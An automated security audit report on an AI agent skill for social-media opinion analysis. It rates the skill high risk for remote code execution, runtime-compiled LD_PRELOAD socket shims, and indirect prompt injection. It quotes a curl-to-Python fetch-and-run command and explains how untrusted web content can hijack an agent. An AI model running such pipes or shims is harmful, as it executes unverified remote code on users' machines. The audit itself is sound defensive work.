bettafish-opinion-analysis
Fail
Audited by Gen Agent Trust Hub on Mar 9, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The core
SKILL.mdfile explicitly guides the AI to use a dangerous execution pattern: fetching remote data viacurland piping it directly into a Python interpreter (e.g.,curl -s "https://api.example.com/data" | python). This allows for the execution of arbitrary, unverified code from external servers. - [DYNAMIC_EXECUTION]: The file
subskills/docx/scripts/office/soffice.pycontains an embedded C source code string that is written to a temporary file and compiled at runtime usinggcc. The resulting shared object is then loaded into the environment viaLD_PRELOADto shim system-level socket calls. This is a highly invasive technique used to manipulate process behavior. - [COMMAND_EXECUTION]: The skill frequently executes external binaries and shell scripts through
subprocess.runand.shfiles, includingffmpegfor video frame extraction,gccfor runtime compilation, andsofficefor Word document processing. - [INDIRECT_PROMPT_INJECTION]: The skill is designed to ingest vast amounts of untrusted data from social media platforms (Weibo, Xiaohongshu, Douyin) and general web searches. It lacks explicit boundary markers or sanitization logic to prevent adversarial instructions embedded in this data from hijacking the agent's logic (Category 8).
- [EXTERNAL_DOWNLOADS]: The skill performs numerous network operations to non-whitelisted domains to fetch content for opinion analysis, increasing the risk of data exfiltration or ingestion of malicious content.
Recommendations
- HIGH: Downloads and executes remote code from: https://api.example.com/data - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata